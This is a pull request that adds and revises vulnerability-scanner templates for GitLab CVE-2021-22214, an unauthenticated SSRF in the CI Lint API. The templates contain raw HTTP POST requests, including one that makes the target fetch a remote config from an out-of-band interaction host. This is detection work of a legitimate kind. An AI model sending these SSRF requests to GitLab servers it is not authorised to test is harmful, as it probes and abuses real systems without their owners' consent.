### PR TITLE
CVE 2021-22214 - Unauthenticated Gitlab SSRF - CI Lint API

### DIFF
--- a/cves/2021/CVE-2021-22214.yaml
+++ b/cves/2021/CVE-2021-22214.yaml
@@ -1,11 +1,14 @@
-id: CVE-2021-22214-gitlab-ci-lint-api-ssrf
+id: CVE-2021-22214
 
 info:
   author: Suman_Kar
-  name: GitLab CVE 2021-22214 Unauthenticated CI lint API information disclosure and SSRF
+  name: Unauthenticated CI lint API information disclosure and SSRF
   severity: medium
-  reference: https://docs.gitlab.com/ee/api/lint.html
-  tags: gitlab,disclosure,ssrf
+  description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
+  reference: |
+      - https://nvd.nist.gov/vuln/detail/CVE-2021-22214
+      - https://docs.gitlab.com/ee/api/lint.html
+  tags: cve,cve2021,gitlab,ssrf
 
 requests:
   - raw:

--- a/cves/2021/CVE-2021-22214.yaml
+++ b/cves/2021/CVE-2021-22214.yaml
@@ -2,32 +2,29 @@ id: CVE-2021-22214
 
 info:
   author: Suman_Kar
-  name: Unauthenticated CI lint API information disclosure and SSRF
+  name: Unauthenticated Gitlab SSRF - CI Lint API
   severity: medium
   description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
   reference: |
       - https://nvd.nist.gov/vuln/detail/CVE-2021-22214
+      - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
       - https://docs.gitlab.com/ee/api/lint.html
-  tags: cve,cve2021,gitlab,ssrf
+  tags: cve,cve2021,gitlab,ssrf,oob
 
 requests:
   - raw:
       - |
-        POST /api/v4/ci/lint HTTP/1.1
+        POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
         Referer: {{BaseURL}}
         content-type: application/json
         Connection: close
 
-        {"content": "{\"another_test\": {\"stage\": \"test\", \"script\": [ \"echo 2\" ] }}"}
+        {"content": "include:\n  remote: http://{{interactsh-url}}/api/v1/targets?test.yml"}
 
-    matchers-condition: and
     matchers:
-      - type: regex
-        part: body
-        regex:
-          - (?:^|\W)valid(?:$|\W)
-      - type: status
-        status:
-          - 200
+      - type: word
+        part: interactsh_protocol # Confirms the DNS Interaction
+        words:
+          - "dns"

--- a/vulnerabilities/gitlab/gitlab-cilint-api-information-disclosureand-ssrf.yaml
+++ b/vulnerabilities/gitlab/gitlab-cilint-api-information-disclosureand-ssrf.yaml
@@ -1,0 +1,30 @@
+id: CVE-2021-22214-gitlab-ci-lint-api-ssrf
+
+info:
+  author: Suman_Kar
+  name: GitLab CVE 2021-22214 Unauthenticated CI lint API information disclosure and SSRF
+  severity: medium
+  reference: https://docs.gitlab.com/ee/api/lint.html
+  tags: gitlab,disclosure,ssrf
+
+requests:
+  - raw:
+      - |
+        POST /api/v4/ci/lint HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
+        Referer: {{BaseURL}}
+        content-type: application/json
+        Connection: close
+
+        {"content": "{\"another_test\": {\"stage\": \"test\", \"script\": [ \"echo 2\" ] }}"}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - (?:^|\W)valid(?:$|\W)
+      - type: status
+        status:
+          - 200

--- a/workflows/gitlab-workflow.yaml
+++ b/workflows/gitlab-workflow.yaml
@@ -11,3 +11,6 @@ workflows:
   - template: exposed-panels/gitlab-detect.yaml
     subtemplates:
       - template: misconfiguration/gitlab/
+      - template: vulnerabilities/gitlab/
+      - template: cves/2020/CVE-2020-2096.yaml
+      - template: cves/2021/CVE-2021-22214.yaml


### PR DESCRIPTION
GitLab CVE 2021-22214 Unauthenticated CI lint API information disclosure and SSRF